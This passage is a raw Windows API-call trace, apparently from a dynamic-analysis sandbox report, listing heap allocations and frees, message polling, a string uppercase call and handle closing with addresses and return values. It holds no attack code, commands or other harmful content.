wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.686] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.687] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.687] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.689] FreeLibrary (hLibModule=0x74d40000) returned 1 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.689] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.692] CloseHandle (hObject=0x2c8) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.698] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0267.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 